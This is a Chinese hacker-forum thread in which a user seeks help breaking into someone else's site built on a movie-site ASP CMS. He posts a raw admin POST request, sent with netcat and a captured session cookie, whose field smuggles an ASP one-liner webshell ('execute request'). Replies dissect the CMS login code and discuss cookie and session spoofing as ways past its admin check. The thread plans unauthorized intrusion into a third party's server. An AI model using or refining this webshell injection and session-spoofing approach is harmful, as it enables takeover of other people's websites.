[讨论]关于Cookie的问题
议题作者:12345xxx信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
原始连接:[url]http://bbs.77169.org/read-htm-tid-149769.html[/url]
对方用的是一个整站
知道数据库扩展名为 .asp (密码MD5 查不到..)想在数据库插人一句话.
拿自己的电脑做实验 只有成功登陆后台的Cookie才能用NC提交.但是登陆后的Cookie本身没什么改变. 哪位师傅帮我讲一下Cookie的原理怎么实现的?
这是我的提交包
[quote]POST /admin/admin_gg.asp?ggt=gg HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: [url]http://10.10.10.10/admin/admin_gg.asp[/url]
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar)
Host: 10.10.10.10
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQATRABQ=MJCLJLIAHOLEFAPAKLNNKEJI;
gs=swf&src=%3C%25execute+request%28&address=%23&endtime=2005-3-10&kt=1&Submit=%D0%DE%B8%C4[/quote]
[quote]Cookie: ASPSESSIONIDSQATRABQ=MJCLJLIAHOLEFAPAKLNNKEJI;[/quote]
这行是登陆后的Cookie
如果这个Cookie我没在正确登入后台的话.NC提交无效.
他的整站源码是这个
[url]http://www.mycodes.net/soft/2744.htm[/url]
非常简单的电影系统.还有一个上传不需要登陆的.可是提交不上....
在华夏黑基的论坛都没人帮我.是我的问题太简单了还是太难了?不解... [s:34] 这 应该是session认证吧??? 上网无聊,帮你分析一下他的后台登陆验证方式吧!
登陆验证文件(删除一些无关紧要内容)chk.asp:
[code]
<%
dim action
action=trim(request("action"))
if action="logout" then
session("aid")=""
response.redirect "../index.asp"
end if
dim name,pwd,code1,checkcode
call iperror()
'获取表单登陆信息
name=trim(request("name"))
pwd=MD5(trim(request("pwd")))
code1=replace(trim(request("code")),"'","‘")
checkcode=replace(trim(request.cookies("look")("code")),"'","‘")
if name="" or trim(request("pwd"))="" then
response.redirect "../error.asp"
end if
if not code1=checkcode then
response.write "<script language=JavaScript>{window.alert('附加码错误,请重新输入!');window.history.go(-1);}</script>"
response.end
end if
set rs=conn.execute("select id from [admin] where name='"&name&"' and pwd='"&pwd&"'")
if rs.eof and rs.bof then
response.write "<script language=JavaScript>{window.alert('您输入的用户名或密码错误,请重新输入!');window.history.go(-1);}</script>"
response.end
else
//登陆成功,执行下面内容
session("aid")=rs(0) //生成一个session
session.timeout=90
response.cookies("look")("code")=""
conn.execute("update [admin] set hits=hits+1,sctime=lasttime,lasttime=Now() where id="&rs(0))
response.redirect "admin.asp"
end if
rs.close
set rs=nothing
call cclose
%>[/code]
从上面代码来看,应该是通过session来做为判断是否登陆的依据的,
看识别登陆的文件(关键代码)top1.asp:
[code]
dim id,adminname,loginname,rs
id=trim(session("aid")) //通过session获取变量参数
set rs=conn.execute("select name,fullname from [admin] where id="&id)
if rs.eof and rs.bof then
response.redirect "index.asp" //如果数据库中记录为空就是没有这个用户,转向“index.asp”
else
loginname=rs(0)
adminname=rs(1)
end if
rs.close
set rs=nothing[/code]
可以肯定是通过session来判断的!
至于cookies和session的你可以从google里找到很多内容!
%> 感谢前辈分析.猛查资料中...
看了资料. [quote]Session的值却是保存在服务器端.[/quote]
难道Session除非在有限权修改ASP文件的情况下 才能Session欺骗吗?
难道没有其他利用办法了吗 ASP里:
cookie的值和session是一一对应的。
你用别人的cookie代替你的cookie,在asp中你的session就是别人的session了。 谢谢楼上的分析.又学到点. 但是我感觉我目标源码是不是先session认证 然后在判断cookie有没有效呢?
我自己想的.呵呵各位师傅别见笑.. [s:81] Cookies保存在本机,Session是一个会话.保存在服务端.所以楼主想什么所谓session欺骗那是不可能的事情...提交cookies是才可以欺骗... 知道了.谢谢.
我那个源码是不是没有cookies欺骗的地方.
这贴让我知道session和Cookies的区别. 谢谢大家 hoho 难道不能session欺骗?6楼的兄弟 说的太绝对了吧 他这种情况可能不能实现Session欺骗 但其他的情况是可能的 虫虫说的我就不懂了 呵呵
如果他加入了session的验证 好象cookie欺骗就没有什么太大的意义了吧!
都是小弟的愚建 有很多错误 千万别笑 [s:58] session和cookie实现机制本质上是相同的。 cookies是存在的 不过没有作为登陆判断的依据罢了
这个你应该欺骗不过去
session("aid")=""
response.redirect "../index.asp"
写的很明白了 商业网站都没强人的啊,华夏黑基那种垃圾地方,必是没人帮你的。有技术含量的建议先来邪八!:lol:
页:
[1]